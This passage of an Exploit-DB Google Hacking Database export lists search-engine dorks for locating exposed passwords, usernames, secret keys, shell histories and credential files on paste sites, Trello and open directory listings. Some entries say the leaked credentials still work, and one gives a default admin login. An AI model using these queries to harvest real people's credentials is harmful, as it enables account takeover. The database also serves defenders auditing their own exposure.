<textualDescription># Google Dork: site:pastebin.com &quot;admin password&quot;
# Files Containing Passwords
# Date:15/11/2021
# Exploit Author: Saumyajeet Das</textualDescription>
<query>site:pastebin.com &quot;admin password&quot;</query>
<querystring>https://www.google.com/search?q=site:pastebin.com &quot;admin password&quot;</querystring>
<edb></edb>
<date>2021-11-15</date>
<author>Saumyajeet Das</author>
</entry>
<entry>
<id>7752</id>
<link>https://www.exploit-db.com/ghdb/7752</link>
<category>Files Containing Passwords</category>
<shortDescription>site:pastebin.com &quot;password&quot;</shortDescription>
<textualDescription># Google Dork: site:pastebin.com &quot;password&quot;
# Files Containing Passwords
# Date:10/11/2021
# Exploit Author: Krishna Agarwal</textualDescription>
<query>site:pastebin.com &quot;password&quot;</query>
<querystring>https://www.google.com/search?q=site:pastebin.com &quot;password&quot;</querystring>
<edb></edb>
<date>2021-11-10</date>
<author>Krishna Agarwal</author>
</entry>
<entry>
<id>4750</id>
<link>https://www.exploit-db.com/ghdb/4750</link>
<category>Files Containing Passwords</category>
<shortDescription>site:pastebin.com &quot;rcon_password&quot;</shortDescription>
<textualDescription>Finding rcon_ passwords to source engine based game servers on pastebin.
This allows you to execute server side commands, it is kinda like an admin
password.
Use ethically and responsibly.
Dork by _palonE
</textualDescription>
<query>site:pastebin.com &quot;rcon_password&quot;</query>
<querystring>https://www.google.com/search?q=site:pastebin.com &quot;rcon_password&quot;</querystring>
<edb></edb>
<date>2018-04-06</date>
<author>_palonE</author>
</entry>
<entry>
<id>4534</id>
<link>https://www.exploit-db.com/ghdb/4534</link>
<category>Files Containing Passwords</category>
<shortDescription>site:pastebin.com intext:&quot;*@*.com:*&quot;</shortDescription>
<textualDescription>site:pastebin.com intext:&quot;*@*.com:*&quot;
Finds pastebin.com dumped mail lists with passwords
TPNight</textualDescription>
<query>site:pastebin.com intext:&quot;*@*.com:*&quot;</query>
<querystring>https://www.google.com/search?q=site:pastebin.com intext:&quot;*@*.com:*&quot;</querystring>
<edb></edb>
<date>2017-06-20</date>
<author>anonymous</author>
</entry>
<entry>
<id>4262</id>
<link>https://www.exploit-db.com/ghdb/4262</link>
<category>Files Containing Passwords</category>
<shortDescription>site:pastebin.com intext:@gmail.com | @yahoo.com | @hotmail.com daterange:2457388-2457491</shortDescription>
<textualDescription># Exploit Title: [Files Containing E-mail and Associated Password Lists]
# Google Dork: [site:pastebin.com intext:@gmail.com | @yahoo.com |
@hotmail.com daterange:2457388-2457491 (adjust daterange as required)]
# Date: [04/13/2016]
# Exploit Author: [Stephanie Jensen]
# Contact: [https://twitter.com/Steph_J_]
# Website: [http://www.scriptkittysecurity.com]
1.Description
This dork searches for all files within pastebin.com containing email
addresses associated with yahoo, gmail or hotmail accounts. Due to the
culture of pastebin.com most entries contain associated passwords for
these email addresses. Setting a relatively recent daterange query
term allows for recent files to be displayed.
site:pastebin.com intext:@gmail.com | @yahoo.com | @hotmail.com
daterange:2457388-2457491 (date range can be changed for recent
listing of files - must use julian dates)
</textualDescription>
<query>site:pastebin.com intext:@gmail.com | @yahoo.com | @hotmail.com daterange:2457388-2457491</query>
<querystring>https://www.google.com/search?q=site:pastebin.com intext:@gmail.com | @yahoo.com | @hotmail.com daterange:2457388-2457491</querystring>
<edb></edb>
<date>2016-04-14</date>
<author>anonymous</author>
</entry>
<entry>
<id>6611</id>
<link>https://www.exploit-db.com/ghdb/6611</link>
<category>Files Containing Passwords</category>
<shortDescription>site:pastebin.com intext:admin.password</shortDescription>
<textualDescription>Name: Paramjot Singh
Category: Files Containing Passwords
Description: This dork helps in finding dumped admin:password combos.
Attached Images can be found below:
</textualDescription>
<query>site:pastebin.com intext:admin.password</query>
<querystring>https://www.google.com/search?q=site:pastebin.com intext:admin.password</querystring>
<edb></edb>
<date>2020-10-14</date>
<author>Paramjot Singh</author>
</entry>
<entry>
<id>7690</id>
<link>https://www.exploit-db.com/ghdb/7690</link>
<category>Files Containing Passwords</category>
<shortDescription>site:pastebin.com intext:pass.txt</shortDescription>
<textualDescription># Google Dork: site:pastebin.com intext:pass.txt
# Files Containing Passwords
# Date: 08/11/2021
# Exploit Author: Anirudh Kumar Kushwaha</textualDescription>
<query>site:pastebin.com intext:pass.txt</query>
<querystring>https://www.google.com/search?q=site:pastebin.com intext:pass.txt</querystring>
<edb></edb>
<date>2021-11-09</date>
<author>Anirudh Kumar Kushwaha</author>
</entry>
<entry>
<id>7628</id>
<link>https://www.exploit-db.com/ghdb/7628</link>
<category>Files Containing Passwords</category>
<shortDescription>site:pastebin.com intext:password.txt</shortDescription>
<textualDescription># Google Dork: site:pastebin.com intext:password.txt
# Files Containing Passwords
# Date:5/11/2021
# Exploit Author: Krishna Agarwal</textualDescription>
<query>site:pastebin.com intext:password.txt</query>
<querystring>https://www.google.com/search?q=site:pastebin.com intext:password.txt</querystring>
<edb></edb>
<date>2021-11-05</date>
<author>Krishna Agarwal</author>
</entry>
<entry>
<id>4030</id>
<link>https://www.exploit-db.com/ghdb/4030</link>
<category>Files Containing Passwords</category>
<shortDescription>site:pastebin.com intext:Username</shortDescription>
<textualDescription># Exploit Title: [site:pastebin.com intext:Username]
# Google Dork: [Pastebin Username &amp; Password]
# Date: [6/29/2015]
# Exploit Author: [Daz Holmes]</textualDescription>
<query>site:pastebin.com intext:Username</query>
<querystring>https://www.google.com/search?q=site:pastebin.com intext:Username</querystring>
<edb></edb>
<date>2015-06-30</date>
<author>anonymous</author>
</entry>
<entry>
<id>7518</id>
<link>https://www.exploit-db.com/ghdb/7518</link>
<category>Files Containing Passwords</category>
<shortDescription>site:pastebin.com intext:username | password | SECRET_KEY</shortDescription>
<textualDescription># Google Dork: site:pastebin.com intext:username | password | SECRET_KEY
# Files Containing Passwords
# Date:29/10/2021
# Exploit Author: Jorge Manuel Lozano Gómez</textualDescription>
<query>site:pastebin.com intext:username | password | SECRET_KEY</query>
<querystring>https://www.google.com/search?q=site:pastebin.com intext:username | password | SECRET_KEY</querystring>
<edb></edb>
<date>2021-10-29</date>
<author>Jorge Manuel Lozano Gómez</author>
</entry>
<entry>
<id>7141</id>
<link>https://www.exploit-db.com/ghdb/7141</link>
<category>Files Containing Passwords</category>
<shortDescription>site:pastebin.com intitle:&quot;password&quot; 2021</shortDescription>
<textualDescription># Google Dork: site:pastebin.com intitle:&quot;password&quot; 2021
# Files Containing Passwords
# Date: 24/08/2021
# Exploit Author: Deepak Kumar
</textualDescription>
<query>site:pastebin.com intitle:&quot;password&quot; 2021</query>
<querystring>https://www.google.com/search?q=site:pastebin.com intitle:&quot;password&quot; 2021</querystring>
<edb></edb>
<date>2021-09-01</date>
<author>Deepak Kumar</author>
</entry>
<entry>
<id>7809</id>
<link>https://www.exploit-db.com/ghdb/7809</link>
<category>Files Containing Passwords</category>
<shortDescription>site:rentry.co intext:&quot;password&quot;</shortDescription>
<textualDescription># Google Dork: site:rentry.co intext:&quot;password&quot;
# Files Containing Passwords
# Date:15/11/2021
# Exploit Author: Anirudh Kumar Kushwaha</textualDescription>
<query>site:rentry.co intext:&quot;password&quot;</query>
<querystring>https://www.google.com/search?q=site:rentry.co intext:&quot;password&quot;</querystring>
<edb></edb>
<date>2021-11-15</date>
<author>Anirudh Kumar Kushwaha</author>
</entry>
<entry>
<id>4819</id>
<link>https://www.exploit-db.com/ghdb/4819</link>
<category>Files Containing Passwords</category>
<shortDescription>site:showmyhomework.co.uk/school/homeworks/ &quot;password&quot;</shortDescription>
<textualDescription>Shows educational site passwords left for students, meant to be accessed
via login portal
Found by @LewisBugBounty / fifteen@riseup.net
</textualDescription>
<query>site:showmyhomework.co.uk/school/homeworks/ &quot;password&quot;</query>
<querystring>https://www.google.com/search?q=site:showmyhomework.co.uk/school/homeworks/ &quot;password&quot;</querystring>
<edb></edb>
<date>2018-05-16</date>
<author>LewisBugBounty</author>
</entry>
<entry>
<id>4311</id>
<link>https://www.exploit-db.com/ghdb/4311</link>
<category>Files Containing Passwords</category>
<shortDescription>site:static.ow.ly/docs/ intext:@gmail.com | Password</shortDescription>
<textualDescription>This dork results in documents containing passwords that are stuck in ow.ly
cache.
Majority are from 2016 and are still working.
Discovered by @BLM_KRS (Twitter)</textualDescription>
<query>site:static.ow.ly/docs/ intext:@gmail.com | Password</query>
<querystring>https://www.google.com/search?q=site:static.ow.ly/docs/ intext:@gmail.com | Password</querystring>
<edb></edb>
<date>2016-07-20</date>
<author>anonymous</author>
</entry>
<entry>
<id>4813</id>
<link>https://www.exploit-db.com/ghdb/4813</link>
<category>Files Containing Passwords</category>
<shortDescription>site:trello.com intext:mysql AND intext:password -site:developers.trello.com -site:help.trello.com</shortDescription>
<textualDescription>Public Trello Boards with Juicy Stuff
site:trello.com intext:mysql AND intext:password -site:developers.trello.com
-site:help.trello.com
Dec0y
</textualDescription>
<query>site:trello.com intext:mysql AND intext:password -site:developers.trello.com -site:help.trello.com</query>
<querystring>https://www.google.com/search?q=site:trello.com intext:mysql AND intext:password -site:developers.trello.com -site:help.trello.com</querystring>
<edb></edb>
<date>2018-05-10</date>
<author>Dec0y</author>
</entry>
<entry>
<id>4605</id>
<link>https://www.exploit-db.com/ghdb/4605</link>
<category>Files Containing Passwords</category>
<shortDescription>site:trello.com password</shortDescription>
<textualDescription>This will bring public Trello boards often containing user names and passwords. You can guess the context from the other cards published or fine-tune the query to probe boards you're interested in.
</textualDescription>
<query>site:trello.com password</query>
<querystring>https://www.google.com/search?q=site:trello.com password</querystring>
<edb></edb>
<date>2017-10-30</date>
<author>adam oczos</author>
</entry>
<entry>
<id>24</id>
<link>https://www.exploit-db.com/ghdb/24</link>
<category>Files Containing Passwords</category>
<shortDescription>spwd.db / passwd</shortDescription>
<textualDescription>There's nothing that defines a googleDork more than getting your PASSWORDS grabbed by Google for the world to see. Truly the epitome of a googleDork. And what if the passwords are hashed? A password cracker can eat cheesy password hashes faster than Elvis eatin' jelly doughnuts. Bravo googleDorks! Good show!</textualDescription>
<query>intitle:&quot;Index of&quot; spwd.db passwd -pam.conf</query>
<querystring>https://www.google.com/search?q=intitle:%22Index+of%22+spwd.db+passwd+-pam.conf&amp;safe=off&amp;start=10&amp;sa=N</querystring>
<edb></edb>
<date>2003-06-24</date>
<author>anonymous</author>
</entry>
<entry>
<id>55</id>
<link>https://www.exploit-db.com/ghdb/55</link>
<category>Files Containing Passwords</category>
<shortDescription>trillian.ini</shortDescription>
<textualDescription>Trillian pulls together all sort of messaging clients like AIM MSN, Yahoo, IRC, ICQ, etc. The various ini files that trillian uses include files like aim.ini and msn.ini. These ini files contain encoded passwords, usernames, buddy lists, and all sorts of other fun things. Thanks for putting these on the web for us, googledorks!</textualDescription>
<query>intitle:index.of trillian.ini</query>
<querystring>https://www.google.com/search?q=intitle%3A%22index+of%22+trillian.ini</querystring>
<edb></edb>
<date>2003-08-19</date>
<author>anonymous</author>
</entry>
<entry>
<id>5103</id>
<link>https://www.exploit-db.com/ghdb/5103</link>
<category>Files Containing Passwords</category>
<shortDescription>username | password inurl:resources/application.properties -github.com -gitlab</shortDescription>
<textualDescription>Credentials
Bruno Schmid
https://ch.linkedin.com/in/schmidbruno
</textualDescription>
<query>username | password inurl:resources/application.properties -github.com -gitlab</query>
<querystring>https://www.google.com/search?q=username | password inurl:resources/application.properties -github.com -gitlab</querystring>
<edb></edb>
<date>2019-02-15</date>
<author>Bruno Schmid</author>
</entry>
<entry>
<id>914</id>
<link>https://www.exploit-db.com/ghdb/914</link>
<category>Files Containing Passwords</category>
<shortDescription>wwwboard WebAdmin inurl:passwd.txt wwwboard|webadmin</shortDescription>
<textualDescription>This is a filtered version of previous 'inurl:passwd' searches, focusing on WWWBoard [1]. There are different crypt functions involved [2], but the default username and password is 'WebAdmin:WebBoard' without the quotes. This is my first Googledork entry, so be gentle :)Funny enough, many of the DES hashes seem to use a salt of &quot;ae&quot;. I tried just using this string along with the inurl portion, but it seemed to inappropriately restrict the search. Couple this with [3] and, um, yeah.cykyc[1]http://www.scriptarchive.com/wwwboard.html[2]http://www.scriptarchive.com/faq/wwwboard.html#q2[3]http://johnny.ihackstuff.com/index.php?module=prodreviews&amp;func=showcontent&amp;id=625</textualDescription>
<query>wwwboard WebAdmin inurl:passwd.txt wwwboard|webadmin</query>
<querystring>https://www.google.com/search?q=wwwboard+WebAdmin++inurl:passwd.txt+wwwboard%7Cwebadmin+&amp;c2coff=1&amp;filter=0</querystring>
<edb></edb>
<date>2005-03-28</date>
<author>anonymous</author>
</entry>
<entry>
<id>3946</id>
<link>https://www.exploit-db.com/ghdb/3946</link>
<category>Files Containing Passwords</category>
<shortDescription>xamppdirpasswd.txt filetype:txt</shortDescription>
<textualDescription>xamppdirpasswd.txt filetype:txt</textualDescription>
<query>xamppdirpasswd.txt filetype:txt</query>
<querystring>https://www.google.com/search?q=xamppdirpasswd.txt filetype:txt</querystring>
<edb></edb>
<date>2014-04-28</date>
<author>anonymous</author>
</entry>
<entry>
<id>1048</id>
<link>https://www.exploit-db.com/ghdb/1048</link>
<category>Files Containing Passwords</category>
<shortDescription>[WFClient] Password= filetype:ica</shortDescription>
<textualDescription>The WinFrame-Client infos needed by users to connect toCitrix Application Servers (e.g. Metaframe).Often linked/stored on Webservers and sometimes reachable from Internet.Password is 16-byte-Hash of unknown encryption (MSCHAPv2 ?).File Extension is &quot;ica&quot; the so called CitrixÂî Independent Computing Architecture.These files may contain login information (Username, Password, Domain).</textualDescription>
<query>[WFClient] Password= filetype:ica</query>
<querystring>https://www.google.com/search?q=%5BWFClient%5D+Password%3D+filetype%3Aica</querystring>
<edb></edb>
<date>2005-07-27</date>
<author>anonymous</author>
</entry>
<entry>
<id>6680</id>
<link>https://www.exploit-db.com/ghdb/6680</link>
<category>Files Containing Usernames</category>
<shortDescription>&quot;'dsn: mysql:host=localhost;dbname=&quot; ext:yml | ext:txt &quot;password:&quot;</shortDescription>
<textualDescription># Google Dork: &quot;'dsn: mysql:host=localhost;dbname=&quot; ext:yml | ext:txt &quot;password:&quot;
# Exposed usernames and passwords.
# Date: 9/11/2020
# Exploit Author: Alexandros Pappas
</textualDescription>
<query>&quot;'dsn: mysql:host=localhost;dbname=&quot; ext:yml | ext:txt &quot;password:&quot;</query>
<querystring>https://www.google.com/search?q=&quot;'dsn: mysql:host=localhost;dbname=&quot; ext:yml | ext:txt &quot;password:&quot;</querystring>
<edb></edb>
<date>2020-11-17</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>4447</id>
<link>https://www.exploit-db.com/ghdb/4447</link>
<category>Files Containing Usernames</category>
<shortDescription>&quot;authentication failure; logname=&quot; ext:log</shortDescription>
<textualDescription>Finds log files for failed logins, containing usernames and login paths.
Dxtroyer</textualDescription>
<query>&quot;authentication failure; logname=&quot; ext:log</query>
<querystring>https://www.google.com/search?q=&quot;authentication failure; logname=&quot; ext:log</querystring>
<edb></edb>
<date>2017-04-25</date>
<author>anonymous</author>
</entry>
<entry>
<id>6601</id>
<link>https://www.exploit-db.com/ghdb/6601</link>
<category>Files Containing Usernames</category>
<shortDescription>&quot;CREATE ROLE&quot; + &quot;ENCRYPTED PASSWORD&quot; ext:sql | ext:txt | ext:ini -git -gitlab</shortDescription>
<textualDescription># Google Dork: &quot;CREATE ROLE&quot; + &quot;ENCRYPTED PASSWORD&quot; ext:sql | ext:txt | ext:ini -git -gitlab
# Exposed usernames, passwords and more...
# Date: 9/10/2020
# Exploit Author: Alexandros Pappas
</textualDescription>
<query>&quot;CREATE ROLE&quot; + &quot;ENCRYPTED PASSWORD&quot; ext:sql | ext:txt | ext:ini -git -gitlab</query>
<querystring>https://www.google.com/search?q=&quot;CREATE ROLE&quot; + &quot;ENCRYPTED PASSWORD&quot; ext:sql | ext:txt | ext:ini -git -gitlab</querystring>
<edb></edb>
<date>2020-10-09</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>6634</id>
<link>https://www.exploit-db.com/ghdb/6634</link>
<category>Files Containing Usernames</category>
<shortDescription>&quot;DefaultPassword&quot; ext:reg &quot;[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]&quot;</shortDescription>
<textualDescription># Google Dork: &quot;DefaultPassword&quot; ext:reg &quot;[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]&quot;
# Exposed default usernames and passwords in Windows registry.
# Date: 10/10/2020
# Exploit Author: Alexandros Pappas
</textualDescription>
<query>&quot;DefaultPassword&quot; ext:reg &quot;[HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionWinlogon]&quot;</query>
<querystring>https://www.google.com/search?q=&quot;DefaultPassword&quot; ext:reg &quot;[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]&quot;</querystring>
<edb></edb>
<date>2020-10-21</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>6535</id>
<link>https://www.exploit-db.com/ghdb/6535</link>
<category>Files Containing Usernames</category>
<shortDescription>&quot;index of&quot; &quot;users.frm&quot;</shortDescription>
<textualDescription># Google Dork: &quot;index of&quot; &quot;users.frm&quot;
# Description :- Disclosure of database file tables and sensitive files.
# Date: 13/09/2020
# Author: Sahil Saxena
# LinkedIn: https://www.linkedin.com/in/sahil-saxena-1333b9174
# Twitter: https://twitter.com/Sahil_delinitor
# GitHub: https://github.com/Sahil-69
# Bugcrowd: https://bugcrowd.com/Prickn
Thanks,
Sahil Saxena
</textualDescription>
<query>&quot;index of&quot; &quot;users.frm&quot;</query>
<querystring>https://www.google.com/search?q=&quot;index of&quot; &quot;users.frm&quot;</querystring>
<edb></edb>
<date>2020-09-14</date>
<author>Sahil Saxena</author>
</entry>
<entry>
<id>154</id>
<link>https://www.exploit-db.com/ghdb/154</link>
<category>Files Containing Usernames</category>
<shortDescription>&quot;index of&quot; / lck</shortDescription>
<textualDescription>These lock files often contain usernames of the user that has locked the file. Username harvesting can be done using this technique.</textualDescription>
<query>&quot;index of&quot; / lck</query>
<querystring>https://www.google.com/search?q=%22index+of%22+%2F+lck</querystring>
<edb></edb>
<date>2004-04-13</date>
<author>anonymous</author>
</entry>
<entry>
<id>4858</id>
<link>https://www.exploit-db.com/ghdb/4858</link>
<category>Files Containing Usernames</category>
<shortDescription>&quot;username.xlsx&quot; ext:xlsx</shortDescription>
<textualDescription>&quot;username.xlsx&quot; ext:xlsx
excel files containing username
ManhNho
</textualDescription>
<query>&quot;username.xlsx&quot; ext:xlsx</query>
<querystring>https://www.google.com/search?q=&quot;username.xlsx&quot; ext:xlsx</querystring>
<edb></edb>
<date>2018-06-14</date>
<author>ManhNho</author>
</entry>
<entry>
<id>197</id>
<link>https://www.exploit-db.com/ghdb/197</link>
<category>Files Containing Usernames</category>
<shortDescription>+intext:&quot;webalizer&quot; +intext:&quot;Total Usernames&quot; +intext:&quot;Usage Statistics for&quot;</shortDescription>
<textualDescription>The webalizer program displays various information but this query displays usernames that have logged into the site. Attckers can use this information to mount an attack.</textualDescription>
<query>+intext:&quot;webalizer&quot; +intext:&quot;Total Usernames&quot; +intext:&quot;Usage Statistics for&quot;</query>
<querystring>https://www.google.com/search?q=Google+for%3A+%2Bintext%3A%22webalizer%22+%2Bintext%3A%22Total+Usernames%22+%2Bintext%3A%22Usage+Statistics+for%22</querystring>
<edb></edb>
<date>2004-05-03</date>
<author>anonymous</author>
</entry>
<entry>
<id>6238</id>
<link>https://www.exploit-db.com/ghdb/6238</link>
<category>Files Containing Usernames</category>
<shortDescription>allintext:username filetype:log</shortDescription>
<textualDescription># Dork : allintext:username filetype:log
# This Dork will show lot of results that include usernames inside all .log files.
# Author : Shivanshu Sharma
Sent from Mail for Windows 10
</textualDescription>
<query>allintext:username filetype:log</query>
<querystring>https://www.google.com/search?q=allintext:username filetype:log</querystring>
<edb></edb>
<date>2020-06-08</date>
<author>Shivanshu Sharma</author>
</entry>
<entry>
<id>9</id>
<link>https://www.exploit-db.com/ghdb/9</link>
<category>Files Containing Usernames</category>
<shortDescription>bash_history files</shortDescription>
<textualDescription>Ok, this file contains what a user typed at a shell command prompt. You shouldn't advertise this file. You shouldn't flash it to a web crawler. It contains COMMANDS and USERNAMES and stuff... *sigh* Sometimes there aren't words to describe how lame people can be. This particular theme can be carried further to find all sorts of things along these lines like .profile, .login, .logout files, etc. I just got bored with all the combinations...</textualDescription>
<query>intitle:index.of .bash_history</query>
<querystring>https://www.google.com/search?q=intitle%3A%22Index+of%22+%2Ebash%5Fhistory</querystring>
<edb></edb>
<date>2003-06-24</date>
<author>anonymous</author>
</entry>
<entry>
<id>6588</id>
<link>https://www.exploit-db.com/ghdb/6588</link>
<category>Files Containing Usernames</category>
<shortDescription>File contains Sensitive Information</shortDescription>
<textualDescription>Google Dorks: &quot;index of&quot; &quot;*.usernames.txt&quot;
Category: File contains Sensitive Information
Author: Abishekraghav Murugeashan
LinkedIn: https://www.linkedin.com/in/arhaxor21/
</textualDescription>
<query>File contains Sensitive Information</query>
<querystring>https://www.google.com/search?q=File contains Sensitive Information</querystring>
<edb></edb>
<date>2020-10-02</date>
<author>Abishekraghav Murugeashan</author>
</entry>
<entry>
<id>245</id>
<link>https://www.exploit-db.com/ghdb/245</link>
<category>Files Containing Usernames</category>
<shortDescription>filetype:conf inurl:proftpd.conf -sample</shortDescription>
<textualDescription>A standard FTP configuration file that provides far too many details about how the server is setup, including installation paths, location of logfiles, generic username and associated group, etc</textualDescription>
<query>filetype:conf inurl:proftpd.conf -sample</query>
<querystring>https://www.google.com/search?q=filetype%3Aconf+inurl%3Aproftpd.conf+-sample+&amp;sourceid=mozilla-search&amp;start=0&amp;start=0</querystring>
<edb></edb>
<date>2004-05-20</date>
<author>anonymous</author>
</entry>
<entry>
<id>6628</id>
<link>https://www.exploit-db.com/ghdb/6628</link>
<category>Files Containing Usernames</category>
<shortDescription>filetype:csv intext:&quot;Secret access key&quot;</shortDescription>
<textualDescription># Dork: filetype:csv intext:&quot;Secret access key&quot;</textualDescription>
<query>filetype:csv intext:&quot;Secret access key&quot;</query>
<querystring>https://www.google.com/search?q=filetype:csv intext:&quot;Secret access key&quot;</querystring>
<edb></edb>
<date>2020-10-21</date>
<author>amrabee</author>
</entry>
<entry>
<id>230</id>
<link>https://www.exploit-db.com/ghdb/230</link>
<category>Files Containing Usernames</category>
<shortDescription>filetype:log username putty</shortDescription>
<textualDescription>These log files record info about the SSH client PUTTY. These files contain usernames, site names, IP addresses, ports and various other information about the SSH server connected to.</textualDescription>
<query>filetype:log username putty</query>
<querystring>https://www.google.com/search?q=filetype%3Alog+username+putty</querystring>
<edb></edb>
<date>2004-05-13</date>
<author>anonymous</author>
</entry>
<entry>
<id>220</id>
<link>https://www.exploit-db.com/ghdb/220</link>
<category>Files Containing Usernames</category>
<shortDescription>filetype:reg reg +intext:&quot;internet account manager&quot;</shortDescription>
<textualDescription>This google search reveals users names, pop3 passwords, email addresses, servers connected to and more. The IP addresses of the users can also be revealed in some cases.</textualDescription>
<query>filetype:reg reg +intext:&quot;internet account manager&quot;</query>
<querystring>https://www.google.com/search?num=100&amp;q=filetype%3Areg+reg+%2Bintext%3A%22internet+account+manager</querystring>
<edb></edb>
<date>2004-05-12</date>
<author>anonymous</author>
</entry>
<entry>
<id>214</id>
<link>https://www.exploit-db.com/ghdb/214</link>
<category>Files Containing Usernames</category>
<shortDescription>filetype:reg reg HKEY_CURRENT_USER username</shortDescription>
<textualDescription>This search finds registry files from the Windows Operating system. Considered the &quot;soul&quot; of the system, these files, and snippets from these files contain sensitive information, in this case usernames and/or passwords.</textualDescription>
<query>filetype:reg reg HKEY_CURRENT_USER username</query>
<querystring>https://www.google.com/search?q=filetype%3Areg+reg+HKEY_CURRENT_USER+username</querystring>
<edb></edb>
<date>2004-05-11</date>
<author>anonymous</author>
</entry>
<entry>
<id>156</id>
<link>https://www.exploit-db.com/ghdb/156</link>
<category>Files Containing Usernames</category>
<shortDescription>index.of perform.ini</shortDescription>
<textualDescription>This file contains information about the mIRC client and may include channel and user names.</textualDescription>
<query>index.of perform.ini</query>
<querystring>https://www.google.com/search?q=index%2Eof+perform%2Eini</querystring>
<edb></edb>
<date>2004-04-13</date>
<author>anonymous</author>
</entry>
<entry>
<id>7049</id>
<link>https://www.exploit-db.com/ghdb/7049</link>
<category>Files Containing Usernames</category>
<shortDescription>intext:&quot;-----BEGIN CERTIFICATE-----&quot; ext:txt</shortDescription>
<textualDescription># Google Dork: intext:&quot;-----BEGIN CERTIFICATE-----&quot; ext:txt
# Pages Files Containing Juicy Info
# Date: 13/08/2021
# Exploit Author: Aftab Alam
</textualDescription>
<query>intext:&quot;-----BEGIN CERTIFICATE-----&quot; ext:txt</query>
<querystring>https://www.google.com/search?q=intext:&quot;-----BEGIN CERTIFICATE-----&quot; ext:txt</querystring>
<edb></edb>
<date>2021-08-13</date>
<author>Aftab Alam</author>
</entry>
<entry>
<id>3848</id>
<link>https://www.exploit-db.com/ghdb/3848</link>
<category>Files Containing Usernames</category>
<shortDescription>intext:&quot;root:x:0:0:root:/root:/bin/bash&quot; inurl:*=/etc/passwd</shortDescription>
<textualDescription>Author: ./tic0 | Izzudin al-Qassam Cyber Fighter</textualDescription>
<query>intext:&quot;root:x:0:0:root:/root:/bin/bash&quot; inurl:*=/etc/passwd</query>
<querystring>https://www.google.com/search?q=intext:&quot;root:x:0:0:root:/root:/bin/bash&quot; inurl:*=/etc/passwd</querystring>
<edb></edb>
<date>2013-04-22</date>
<author>anonymous</author>
</entry>
<entry>
<id>1007</id>
<link>https://www.exploit-db.com/ghdb/1007</link>
<category>Files Containing Usernames</category>
<shortDescription>intext:&quot;SteamUserPassphrase=&quot; intext:&quot;SteamAppUser=&quot; -&quot;username&quot; -&quot;user&quot;</shortDescription>
<textualDescription>This will search for usernames and passwords for steam (www.steampowered.com) taken from the SteamApp.cfg file.</textualDescription>
<query>intext:&quot;SteamUserPassphrase=&quot; intext:&quot;SteamAppUser=&quot; -&quot;username&quot; -&quot;user&quot;</query>
<querystring>https://www.google.com/search?q=intext:%22SteamUserPassphrase%3D%22+intext:%22SteamAppUser%3D%22+-%22username%22++-%22user%22&amp;filter=0</querystring>
<edb></edb>
<date>2005-06-05</date>
<author>anonymous</author>
</entry>
<entry>
<id>6366</id>
<link>https://www.exploit-db.com/ghdb/6366</link>
<category>Files Containing Usernames</category>
<shortDescription>intitle:&quot;index of&quot; &quot;/ftpusers&quot;</shortDescription>
<textualDescription>Title: File containing juicy info
Google Dork: intitle:&quot;index of&quot; &quot;/ftpusers&quot;
Date: 02/07/2020
Author : Mohit Khemchandani</textualDescription>
<query>intitle:&quot;index of&quot; &quot;/ftpusers&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;/ftpusers&quot;</querystring>
<edb></edb>
<date>2020-07-02</date>
<author>Mohit khemchandani</author>
</entry>
<entry>
<id>6621</id>
<link>https://www.exploit-db.com/ghdb/6621</link>
<category>Files Containing Usernames</category>
<shortDescription>intitle:&quot;index of&quot; &quot;/parameters.yml*&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; &quot;/parameters.yml*&quot;
# Files containing usernames and passwords.
# Date: 17/10/2020
# Exploit Author: Alexandros Pappas
</textualDescription>
<query>intitle:&quot;index of&quot; &quot;/parameters.yml*&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;/parameters.yml*&quot;</querystring>
<edb></edb>
<date>2020-10-19</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>7260</id>
<link>https://www.exploit-db.com/ghdb/7260</link>
<category>Files Containing Usernames</category>
<shortDescription>intitle:&quot;index of&quot; &quot;/usernames&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; &quot;/usernames&quot;
# Files Containing Usernames
# Date: 24/08/2021
# Exploit Author: Priyanshu Choudhary</textualDescription>
<query>intitle:&quot;index of&quot; &quot;/usernames&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;/usernames&quot;</querystring>
<edb></edb>
<date>2021-09-20</date>
<author>Priyanshu Choudhary</author>
</entry>
<entry>
<id>7047</id>
<link>https://www.exploit-db.com/ghdb/7047</link>
<category>Files Containing Usernames</category>
<shortDescription>intitle:&quot;index of&quot; &quot;contacts.txt&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; &quot;contacts.txt&quot;
# Files Containing Juicy Info
# Exploit Author: Axel Meneses</textualDescription>
<query>intitle:&quot;index of&quot; &quot;contacts.txt&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;contacts.txt&quot;</querystring>
<edb></edb>
<date>2021-08-13</date>
<author>Axel Meneses</author>
</entry>
<entry>
<id>6685</id>
<link>https://www.exploit-db.com/ghdb/6685</link>
<category>Files Containing Usernames</category>
<shortDescription>intitle:&quot;index of&quot; &quot;credentials.xml&quot; | &quot;credentials.inc&quot; | &quot;credentials.txt&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; &quot;credentials.xml&quot; | &quot;credentials.inc&quot; | &quot;credentials.txt&quot;
# Files containing usernames and passwords.
# Date: 19/11/2020
# Exploit Author: Alexandros Pappas
</textualDescription>
<query>intitle:&quot;index of&quot; &quot;credentials.xml&quot; | &quot;credentials.inc&quot; | &quot;credentials.txt&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;credentials.xml&quot; | &quot;credentials.inc&quot; | &quot;credentials.txt&quot;</querystring>
<edb></edb>
<date>2020-11-19</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>6711</id>
<link>https://www.exploit-db.com/ghdb/6711</link>
<category>Files Containing Usernames</category>
